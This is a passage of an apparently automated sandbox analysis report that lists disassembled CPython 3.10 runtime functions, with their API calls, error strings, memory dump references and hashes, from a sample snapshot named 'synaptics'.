                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Object_$CheckConsistency$AssertDict_FailedFreedUnicode_$ContainsFromType_
                                                                                                                                                                                                      • String ID: !_PyObject_IsFreed(op)$D:\a\1\s\Objects\object.c$_PyObject_CheckConsistency$_Py_REFCNT(((const PyObject*)(op))) >= 1
                                                                                                                                                                                                      • API String ID: 326812879-3153180134
                                                                                                                                                                                                      • Opcode ID: f828d627131562d8d68587a9a3325ea996744a25f93d5730a8c649b304583e5e
                                                                                                                                                                                                      • Instruction ID: 1158d6e83b833392897ae72a415ef3e9b6be79f2e9c0fbed1ac206dd7a4ab93f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f828d627131562d8d68587a9a3325ea996744a25f93d5730a8c649b304583e5e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4601DF35201604BBE621DA84DC01FCE3B5E9F2960DF408418FA68ABE99D725E106CADA
                                                                                                                                                                                                      Function 6C59F9A0 Relevance: 16.7, APIs: 11, Instructions: 201COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyObject_SetAttr.PYTHON310(00000000,?,6C7420B8,?,?), ref: 6C59F9F9
                                                                                                                                                                                                      • PyObject_SetAttr.PYTHON310(00000000,?,00000000,?,?,?,?,?,?,?), ref: 6C59FA3E
                                                                                                                                                                                                      • PyObject_SetAttr.PYTHON310(00000000,?,6C7420B8,?,?,?,?,?,?,?,?,?,?), ref: 6C59FA7A
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(B3FF5600,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C59FA9F
                                                                                                                                                                                                      • PyObject_SetAttr.PYTHON310(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C59FABC
                                                                                                                                                                                                      • PyLong_FromLong.PYTHON310(000003A4), ref: 6C59FAE0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttrObject_$FromLongLong_
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 926964961-0
                                                                                                                                                                                                      • Opcode ID: 33f7187fca79de714c1c20eaefae14c71df23a95dc3e113b711cf7dad6318263
                                                                                                                                                                                                      • Instruction ID: 581a35679580704e081962279b2e8fcae6b0c430e208d23963597d81f818c5f5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33f7187fca79de714c1c20eaefae14c71df23a95dc3e113b711cf7dad6318263
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8951AE72A011119FC7108EA8EC40ED677E8AF46278B1403B4FD29CB6A1E325ED96DBD1
                                                                                                                                                                                                      Function 6C483810 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • frexp.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C483876
                                                                                                                                                                                                      • ldexp.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C4838D3
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BD78,00000000,00000000,00000000,00000000), ref: 6C4839BD
                                                                                                                                                                                                      • _finite.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C483A07
                                                                                                                                                                                                      • _isnan.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C483A28
                                                                                                                                                                                                      • _finite.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C483A3E
                                                                                                                                                                                                      • _isnan.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C483A58
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • float too large to pack with f format, xrefs: 6C483A6C
                                                                                                                                                                                                      • frexp() result out of range, xrefs: 6C4839A0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _finite_isnan$Err_Objectfrexpldexp
                                                                                                                                                                                                      • String ID: float too large to pack with f format$frexp() result out of range
                                                                                                                                                                                                      • API String ID: 1800166686-3985129553
                                                                                                                                                                                                      • Opcode ID: 39f653c27c95ce2196f859577f06601b3d3ac6f2e54b985b79dd4acdccf9195b
                                                                                                                                                                                                      • Instruction ID: de0c2a5f8ae5ceb4b10244ffb51d991c0c3f8dca56d6e8934ff06a8ce3b96cc8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39f653c27c95ce2196f859577f06601b3d3ac6f2e54b985b79dd4acdccf9195b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67710631A19B048FC702DE39C811B4ABBB4AF87355F04876EE895A7781E734D49AC782
                                                                                                                                                                                                      Function 6C489D50 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C3F8,00000000), ref: 6C489DAC
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73C3F8,?), ref: 6C489DDA
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyThreadState_Get), ref: 6C489DEE
                                                                                                                                                                                                      • PyErr_GivenExceptionMatches.PYTHON310(?,6C73C3F8,?,?,?,?,?,6C4533A1,?), ref: 6C489E1A
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(8BC01BD8,?,?,?,?,?,6C4533A1,?), ref: 6C489E66
                                                                                                                                                                                                      • _PyErr_NormalizeException.PYTHON310(?,?,6C4533A1,?,?,?,?,?,?,?,6C4533A1,?), ref: 6C489E99
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,6C73C3F8), ref: 6C489EB3
                                                                                                                                                                                                      • _PyErr_Restore.PYTHON310(?,?,?,?), ref: 6C489ECE
                                                                                                                                                                                                        • Part of subcall function 6C488C80: _PyErr_Format.PYTHON310(?,%R returned NULL without setting an exception,6C73C3F8), ref: 6C488CCA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ExceptionObjectSubtypeType_$Error_FatalFormatGivenMatchesNormalizeRestoreTstate
                                                                                                                                                                                                      • String ID: PyThreadState_Get
                                                                                                                                                                                                      • API String ID: 2671819730-1068966796
                                                                                                                                                                                                      • Opcode ID: 9497cb4b053b96ca86f21a5f15a5dd635a50b27b6463535c1414e0c0d22c1399
                                                                                                                                                                                                      • Instruction ID: ecaf69000d72917e6b812d003b0b8e086db9361c6176d9dce385b491b2edcbb2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9497cb4b053b96ca86f21a5f15a5dd635a50b27b6463535c1414e0c0d22c1399
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9511471B02104AFCB04CFA8D880DAA77B8EF95329B14426DE91897B51E732ED51CBE1
                                                                                                                                                                                                      Function 6C4D5F50 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 173COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyOS_FSPath.PYTHON310(?), ref: 6C4D5FA7
                                                                                                                                                                                                        • Part of subcall function 6C40B730: _PyObject_LookupSpecial.PYTHON310(?,6C74AAD8), ref: 6C40B74F
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(path should be string, bytes, or os.PathLike, not %.200s,?), ref: 6C4D5FE1
                                                                                                                                                                                                      • PyErr_WarnFormat.PYTHON310(00000001,path should be string, bytes, or os.PathLike, not %.200s,?), ref: 6C4D600B
                                                                                                                                                                                                      • PyBytes_FromObject.PYTHON310(00000000), ref: 6C4D6018
                                                                                                                                                                                                      • PyUnicode_DecodeFSDefaultAndSize.PYTHON310(00000010,?), ref: 6C4D603E
                                                                                                                                                                                                      • _PyUnicode_Ready.PYTHON310(00000000), ref: 6C4D6064
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000), ref: 6C4D60E4
                                                                                                                                                                                                        • Part of subcall function 6C4CA9B0: memchr.VCRUNTIME140(?,?,?,00000000,?,?,6C4D60B5,00000000), ref: 6C4CA9C8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • path should be string, bytes, or os.PathLike, not %.200s, xrefs: 6C4D5FD2
                                                                                                                                                                                                      • embedded null character, xrefs: 6C4D60CA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatObjectUnicode_$Bytes_DecodeDefaultFromLookupObject_PathReadySizeSpecialWarnmemchr
                                                                                                                                                                                                      • String ID: embedded null character$path should be string, bytes, or os.PathLike, not %.200s
                                                                                                                                                                                                      • API String ID: 2861027151-1042558932
                                                                                                                                                                                                      • Opcode ID: 59013d00e7bb6988f200cac7c50600fbe681ccdf95c5d1a6568efdca28827bd1
                                                                                                                                                                                                      • Instruction ID: 1fa55b951d3c258c744acc8cc016275c0b6d6066ae6527e63238079f9390fdc6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59013d00e7bb6988f200cac7c50600fbe681ccdf95c5d1a6568efdca28827bd1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B55124B16002018BD711EE69DC91F9673B4EF51329F164268ED28CFBA1EB31F806C792
                                                                                                                                                                                                      Function 6C466A70 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyObject_LengthHint.PYTHON310(?,00000040,00000000,?), ref: 6C466A95
                                                                                                                                                                                                      • _PyBytesWriter_Prepare.PYTHON310 ref: 6C466ADB
                                                                                                                                                                                                      • PyNumber_AsSsize_t.PYTHON310(00000000,00000000,?,?,?,00000000,00000000,?), ref: 6C466B1E
                                                                                                                                                                                                      • _PyBytesWriter_Resize.PYTHON310(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6C466B65
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,?), ref: 6C466BC7
                                                                                                                                                                                                      • PyErr_GivenExceptionMatches.PYTHON310(?,?,?,?,00000000,00000000,?), ref: 6C466C33
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,?,?,00000000,00000000,?), ref: 6C466C40
                                                                                                                                                                                                      • _PyBytesWriter_Finish.PYTHON310(?,00000000,?,?,?,00000000,00000000,?), ref: 6C466C59
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • bytes must be in range(0, 256), xrefs: 6C466BB0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BytesErr_Writer_$ClearExceptionFinishGivenHintLengthMatchesNumber_ObjectObject_PrepareResizeSsize_t
                                                                                                                                                                                                      • String ID: bytes must be in range(0, 256)
                                                                                                                                                                                                      • API String ID: 698564206-1766703951
                                                                                                                                                                                                      • Opcode ID: 740399ce07c0a1ff22841efb1608fbc0b6101560a09d620690f722bd854069f3
                                                                                                                                                                                                      • Instruction ID: 4d0f0c2a718697b832e7b3cdca0bcf3d7b531b5dbb17a5b3585d805925cad2ed
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 740399ce07c0a1ff22841efb1608fbc0b6101560a09d620690f722bd854069f3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D751FE71A093009BD700CF2AD841F8A77E8AF85329F14062DF858DBB91E735E949CBD2
                                                                                                                                                                                                      Function 6C4B7BD0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 150COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74C870,?,?,?,?,?,?,?,00000000), ref: 6C4B7C11
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73EC20,00000000,?,?,?,?,?,?,?,?,00000000), ref: 6C4B7C28
                                                                                                                                                                                                        • Part of subcall function 6C4B4C70: _Py_CheckFunctionResult.PYTHON310(?,00000000,00000000,00000000), ref: 6C4B4CA2
                                                                                                                                                                                                      • PySequence_Tuple.PYTHON310(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4B7C70
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(type MRO must not be empty,?,?,?,?,?,?,?,00000000), ref: 6C4B7CB2
                                                                                                                                                                                                        • Part of subcall function 6C4B7270: _PyUnicode_FromId.PYTHON310(6C74C870,?,?,?,6C4B7BF9,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4B727E
                                                                                                                                                                                                        • Part of subcall function 6C4B7270: _PyType_Lookup.PYTHON310(00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 6C4B728C
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,00000000), ref: 6C4B7CF9
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(mro() returned a non-class ('%.500s'),00000000), ref: 6C4B7D32
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • mro() returned a non-class ('%.500s'), xrefs: 6C4B7D27
                                                                                                                                                                                                      • type MRO must not be empty, xrefs: 6C4B7CA7
                                                                                                                                                                                                      • mro() returned base with unsuitable layout ('%.500s'), xrefs: 6C4B7D1D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatFromUnicode_$ObjectType_$CheckClearFunctionLookupResultSequence_SubtypeTuple
                                                                                                                                                                                                      • String ID: mro() returned a non-class ('%.500s')$mro() returned base with unsuitable layout ('%.500s')$type MRO must not be empty
                                                                                                                                                                                                      • API String ID: 307474380-2968103887
                                                                                                                                                                                                      • Opcode ID: 384513abb00fd001e1e45ad263c9eecf9c006c93fb04c34b44c25ef88d2f0e0c
                                                                                                                                                                                                      • Instruction ID: 1b041e80639165570ff7e8e142de0c4548f20ce2d55f34f967f62e08f702feba
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 384513abb00fd001e1e45ad263c9eecf9c006c93fb04c34b44c25ef88d2f0e0c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F41F672A082049BC710DEA9EC81D9AB3F5EB4032AB15427DD918A7B50E731ED5AC7F1
                                                                                                                                                                                                      Function 6C58D990 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 6C58D9B8
                                                                                                                                                                                                      • PyErr_SetExcFromWindowsErrWithFilenameObjects.PYTHON310(00000000,00000000,00000000), ref: 6C58D9D4
                                                                                                                                                                                                        • Part of subcall function 6C566570: GetLastError.KERNEL32(?,00000000,00000000,?,?,6C566724,?,?,00000000,00000000,6C771ED8,00000000,?,6C4F2DA8,00000000,00000000), ref: 6C56658F
                                                                                                                                                                                                        • Part of subcall function 6C566570: FormatMessageW.KERNELBASE(00001300,00000000,?,00000400,00000000,00000000,00000000,?,00000000,00000000,?,?,6C566724,?,?,00000000), ref: 6C5665AD
                                                                                                                                                                                                        • Part of subcall function 6C566570: PyUnicode_FromFormat.PYTHON310(Windows Error 0x%x,?,?,6C566724,?,?,00000000,00000000,6C771ED8,00000000,?,6C4F2DA8,00000000,00000000), ref: 6C5665BD
                                                                                                                                                                                                        • Part of subcall function 6C566570: LocalFree.KERNEL32(?,J4Ol,00000000,?,?,?,?,?,?,6C4F2FF8), ref: 6C56660E
                                                                                                                                                                                                      • PyErr_SetString.PYTHON310(invalid QueryPerformanceFrequency), ref: 6C58DA0E
                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6C58DA80
                                                                                                                                                                                                      • __alldvrm.LIBCMT ref: 6C58DA9C
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C58DAC2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • invalid QueryPerformanceFrequency, xrefs: 6C58DA03
                                                                                                                                                                                                      • QueryPerformanceFrequency is too large, xrefs: 6C58DAF8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatFromPerformanceQuery$CounterErrorFilenameFreeFrequencyLastLocalMessageObjectsStringUnicode_Unothrow_t@std@@@WindowsWith__alldvrm__ehfuncinfo$??2@
                                                                                                                                                                                                      • String ID: QueryPerformanceFrequency is too large$invalid QueryPerformanceFrequency
                                                                                                                                                                                                      • API String ID: 3600565764-2354254856
